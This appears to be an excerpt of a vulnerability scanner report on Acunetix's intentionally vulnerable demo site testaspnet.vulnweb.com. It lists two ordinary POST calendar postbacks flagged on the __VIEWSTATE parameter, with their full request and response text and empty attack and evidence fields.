Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8470&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAuo7DIdsIZGRkSkBiNA%2BreMUafInQRzuFxdsgVnc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKm%2FfHfCQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJy1QdssyH7Z%2BPhr%2Fxz7uTaCDVt%2Bo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:07 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAuo7DIdsIZGRkSkBiNA+reMUafInQRzuFxdsgVnc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKm/fHfCQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJy1QdssyH7Z+Phr/xz7uTaCDVt+o=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:White" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8458&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAxZFVGNsIZGRkgl4xoWGFEVqF%2Bz%2FoAWkUjkAUNHc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLq5%2FPMDALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJKl7u7sxqnJM3XJDL%2FFupvF6q3HU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:12 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgDAxZFVGNsIZGRkgl4xoWGFEVqF+z/oAWkUjkAUNHc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLq5/PMDALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJKl7u7sxqnJM3XJDL/FupvF6q3HU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:White" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
